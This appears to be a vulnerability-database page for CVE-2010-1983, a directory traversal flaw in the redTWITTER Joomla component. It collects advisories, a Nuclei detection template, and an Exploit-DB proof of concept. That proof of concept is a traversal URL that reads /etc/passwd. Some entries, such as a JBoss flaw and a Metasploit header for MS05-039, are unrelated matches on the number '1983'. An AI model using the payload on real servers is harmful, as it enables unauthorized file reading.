CVE-2010-1983
published 2010-05-19CVE-2010-1983: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary…
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
18.82%
96.9th percentile
Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. NOTE: some of these details are obtained from third party information.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
| redcomponent | com_redtwitter | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat8.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2h4h-6mrx-52ff: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1
ghsa_unreviewed·2022-05-17
CVE-2010-1983 [HIGH] CWE-22 GHSA-2h4h-6mrx-52ff: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1
Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. NOTE: some of these details are obtained from third party information.
Red Hat
JBoss ON CLI privilege escalation
vendor_redhat·2010-03-18·CVSS 8.0
CVE-2010-0737 [HIGH] JBoss ON CLI privilege escalation
JBoss ON CLI privilege escalation
A missing permission check was found in The CLI in JBoss Operations Network before 2.3.1 does not properly check permissions, which allows JBoss ON users to perform management tasks and configuration changes with the privileges of the administrator user.
Statement: This issue was fixed by a patch to JBoss Operations Network 2.3.1, available for download from the Red Hat Customer Portal: https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=1983&product=em&version=2.3.1&downloadType=securityPatches
No detection rules found.
Exploit-DB
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
exploitdb·2010-08-30
CVE-2005-1983 Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
Microsoft Plug and Play Service - Overflow (MS05-039) (Metasploit)
---
##
# $Id: ms05_039_pnp.rb 10190 2010-08-30 20:40:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Plug and Play Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Plug
and Play service. This vulnerability can be exploited on
Windows 2000 without a valid user account.
NOTE: Since the PnP service runs inside the service.exe process, a failed
exploit attempt will cause the system to automatically reboot.
Exploit-DB
Joomla! Component redTWITTER 1.0 - Local File Inclusion
exploitdb·2010-04-04
CVE-2010-1983 Joomla! Component redTWITTER 1.0 - Local File Inclusion
Joomla! Component redTWITTER 1.0 - Local File Inclusion
---
[o] Joomla Component redTWITTER Local File Inclusion Vulnerability
Software : com_redtwitter version 1.0.x
Vendor : http://redcomponent.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_redtwitter&view=[LFI]
[o] PoC
http://localhost/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
Nuclei
Joomla! Component redTWITTER 1.0 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2010-1983 [HIGH] Joomla! Component redTWITTER 1.0 - Local File Inclusion
Joomla! Component redTWITTER 1.0 - Local File Inclusion
A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Template:
id: CVE-2010-1983
info:
name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potentia
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2010-0737 JBoss ON CLI privilege escalation
bugzilla·2011-09-02·CVSS 8.0
CVE-2010-0737 [HIGH] CVE-2010-0737 JBoss ON CLI privilege escalation
CVE-2010-0737 JBoss ON CLI privilege escalation
A missing permission check was found in the JBoss Operations Network CLI, a Java shell that allows you to connect to the JBoss ON server over the command line. An unprivileged JBoss ON user could use this flaw to perform JBoss ON management tasks and configuration changes with the privileges of the administrator user.
Discussion:
Statement:
This issue was fixed by a patch to JBoss Operations Network 2.3.1, available for download from the Red Hat Customer Portal: https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=1983&product=em&version=2.3.1&downloadType=securityPatches
http://evilc0de.blogspot.com/2010/04/joomla-component-redtwitter-lfi-vuln.htmlhttp://osvdb.org/63533http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txthttp://secunia.com/advisories/39342http://www.exploit-db.com/exploits/12055http://www.securityfocus.com/bid/39211https://exchange.xforce.ibmcloud.com/vulnerabilities/57511http://evilc0de.blogspot.com/2010/04/joomla-component-redtwitter-lfi-vuln.htmlhttp://osvdb.org/63533http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txthttp://secunia.com/advisories/39342http://www.exploit-db.com/exploits/12055http://www.securityfocus.com/bid/39211https://exchange.xforce.ibmcloud.com/vulnerabilities/57511
2010-05-19
Published